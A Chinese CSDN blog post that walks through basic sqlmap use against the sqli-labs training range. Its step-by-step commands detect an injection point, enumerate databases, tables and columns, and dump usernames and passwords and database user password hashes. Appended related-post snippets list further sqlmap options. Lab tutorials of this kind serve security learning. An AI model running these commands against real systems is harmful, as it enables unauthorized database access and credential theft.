SQLMAP 的基本使用步骤

最新推荐文章于 2024-02-18 13:57:15 发布
最新推荐文章于 2024-02-18 13:57:15 发布
阅读量976 收藏 6
点赞数
分类专栏: SQLmap 文章标签: 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51768842/article/details/124663509
版权

本文章的实验用例均基于开源sqllab实验靶场进行注入

1.判断是否存在注入点

以sqllab第一关为例

目标地址为:http://www.sqllab1.com/Less-1/?id=1(具体目标地址依具体环境搭建而异)

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1"

 

结果显示存在sql注入点,一般而言,操作过程中sqlmap会在操作过程中需要选择:

  1. 第一处系统检测到数据库可能师MySQL数据库,是否要跳过检测其他数据库
  2. 第二处是在level1 的情况下是否使用mysql对应的所有payload进行检测
  3. 第三处是目前参数存在漏洞,是有要继续检测其他参数

一般情况下默认选择yes回撤即可

查询当前用户下的所有数据库

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --dbs

 

 如图可以得到当前用户下的26个数据库信息

获取数据库中的表名

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --tables -D "security"

 

 获取表中字段名

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --columns -T "users" -D "security"

获取字段内容

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --dump -C "id,password,username" -T "users" -D "security"

 

 --dump 参数是将数据文件转存到文件中,一般在sqlmap/output文件夹下,读者也可以根据标红的区域地址相对的去寻找文件。

获取数据库的所有用户

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --users

 前提是当前用户有权限读取包含所有用户的表的权限时

 获取数据库用户的密码

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --password

 获取当前网站数据库的名称

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --current-db

 获取当前网站数据库的用户名

sqlmap.py -u "http://www.sqllab1.com/Less-1/?id=1" --current-user

 

行 待
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
Sqlmap命令行参数解析(一)
热门推荐
qq_gfq的博客
03-30 1万+
前言本文转载自werner-wiki的博客,便于参考学习(侵权删)原文地址:https://blog.csdn.net/wn314/article/details/78872828。一、Sqlmap是什么Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点:完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft A...
SQLMAP教程,零基础入门到精通,一篇就够了!
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-18 1134
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
sqlmap基本和扩展功能的使用详解(具体操作+图解)
weixin_46709219的博客
11-14 1800
一)sqlmap介绍: sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等。 Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。 Sqlmap采用了以下的SQL注入技术 1) 基于布尔类型的盲注,即可以根据
Sqlmap详解使用
白白白
09-03 5797
转载自https://www.anquanke.com/post/id/235846 作者:谢公子 感谢作者,内容非常详细。 Sqlmap sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5种独特的SQL注入技术 基于布尔类型的盲注,即可
sqlmap-使用教程(自个参考用的)
weixin_42151709的博客
04-07 782
sqlmap使用教程 1.检测注入点是否可用 sqlmap.py -u “url” -u 输入指定注入点url 2.若需要用户输入[y/n],系默认需添加一个参数 sqlmap.py -u “url” --batch 注入结果显示 (1)注入参数id为GET注入,注入类型有四种分别为boolean-based、error-based、time-based blind、union query (2)...
渗透测试-sqlMap工具
weixin_49349476的博客
09-02 2587
利用sqlmap工具攻击web服务器的简单过程,攻击数据库,获取管理员账号和密码,登录网站
SQLMAP基本使用
qq_49310461的博客
10-21 1373
SQLMAP基本使用 检查注入点: sqlmap -u http://aa.com/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs 爆当前数据库信息: sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db 指定库名列出所有表 sqlmap -u http://aa.com/star_phot
【SQL注入工具】SQLMap参数详解
ssrf
09-02 2626
文章目录前言1、基本参数2、显示调试信息3、风险等级4、批量测试多个注入点5、获取http请求注入6、处理Google搜索结果7、以POST方式提交参数8、指定参数连接符9、cookie注入10、referer/headers/proxy11、时间控制12、绕过策略13、手动指定测试参数14、指定参数前后闭合字符15、指定使用哪种探测技术16、UNION查询指定参数17、二阶注入18、搜索指定库/表/列19、--udf-inject/--shared-lib20、日志文件读取与写入21、默认yes22、编码
sqlmap参数详解
十五年游戏主程转渗透之路
04-09 6678
sqlmap
注入神器-----SqlMap使用
weixin_54227009的博客
05-28 1323
sqlmap GET参数: -u 网址 --dbs:获取注入点的所有数据库 -D:指定数据库 --tables:获取指定的表 -T:表名 --columns:获取表的指定字段 -C:获取指定字段 --dump:把数据打印出来 POST注入: 先抓包, 注入点的位置打个*号 然后保存为txt文档 -r 指定的文档 --dbs:获取注入点的所有数据库 --level=3,注入级别默认为1,为三的话注入能力加强一点 --current-db:获取当前数据库 sqlmap获取sh...
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
SqlMap使用
06-24
本文档详细介绍了SqlMap使用教程,SQL注入攻击是黑客对数据库进行攻击的常用手段之一
Sqlmap使用手册中文版
01-13
Sqlmap使用手册中文版 Sqlmap是十分著名的、自动化的SQL注入工具。 sqlmap简介 sqlmap支持五种不同的注入模式: 基于布尔的盲注 基于时间的盲注 基于报错注入 联合查询注入 堆叠注入 Sqlmap是开源的自动化SQL注入...
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍。
SQLmap之sql注入原理利用
qq_58000413的博客
08-11 290
-dbs 枚举可用的数据库。--is--dba 枚举数据库权限。--password 枚举数据库用户密码。--current-db 枚举当前数据库。--current-user 枚举当前用户。--hostname 枚举主机名称。三、通过数据库查询数据表信息。四、通过数据表查询字段信息。五、通过字段枚举字段内容。一、查看数据库相关信息。...
sqlmap常用参数和原理
weixin_64622881的博客
04-18 1343
其原理是通过构造恶意的SQL查询语句,利用应用程序的漏洞来执行SQL注入攻击。具体一点就是,SQLmap首先分析目标网站的结构和参数,尝试检测是否存在SQL注入漏洞。如果存在漏洞,它将尝试利用不同的技术(如布尔盲注、时间盲注、联合查询注入等)来获取数据或者直接对数据库进行修改。
渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战篇
weixin_52796034的博客
10-14 2076
SQLMap,就像它的名字所暗示的,是一个为我们提供方便的“SQL注入攻击”的工具。对于那些不熟悉这个概念的人来说,SQL注入是一种黑客攻击技术,允许攻击者在目标网站的数据库中执行恶意SQL语句。这意味着我们可以控制和操纵网站的数据,甚至可以完全接管整个网站。那么SQLMap如何帮助我们实现这些呢?
sqlmap 常用命令
tryheart的博客
09-01 1158
常用命令 -u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 –dbs 列出所有的数据库 –current-db 列出当前数据库 –tables 列出当前的表 –columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 –dump 获取字段中的数据 –batch 自动选择yes –smart 启发式快速判断,节约浪费时间 –forms 尝试使用post注入 -r 加载文件中的HTTP请求(本地保存的请求包txt文件) -l 加载文件
sqlmap 安装使用
09-23
sqlmap是一种用于自动化SQL注入的工具。要安装和使用sqlmap,您可以按照以下步骤进行操作: 1. 首先,您需要从sqlmap的官方GitHub页面下载安装包。您可以访问这个链接:https://github.com/sqlmapproject/sqlmap 2. 在官方页面的右侧,您会看到一个绿色的按钮,上面写着"Code"。点击该按钮,然后选择"Download ZIP"来下载安装包。 3. 下载完成后,您需要解压缩安装包到您想要安装sqlmap的目录中。可以使用任何解压缩工具来完成这个操作。 4. 解压缩完成后,您可以在解压缩目录中找到sqlmap.py文件。这是sqlmap的主要执行文件。 5. 现在,您可以打开命令提示符窗口(Windows)或终端(Linux、Mac)并导航到sqlmap.py所在的目录。 6. 在命令提示符或终端中,输入以下命令来启动sqlmap: ``` python sqlmap.py ``` 7. 此时,sqlmap将启动并显示其命令行界面。您可以在这个界面中使用各种选项和参数来执行SQL注入测试。 8. 例如,如果您想对一个URL执行SQL注入测试,您可以使用以下命令: ``` python sqlmap.py -u <URL> --dbs ``` 这将列出目标网站的数据库。 请注意,这只是sqlmap基本安装和使用方法。sqlmap具有广泛的功能和选项,您可以通过阅读sqlmap的官方文档来深入了解更多详细信息和用法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值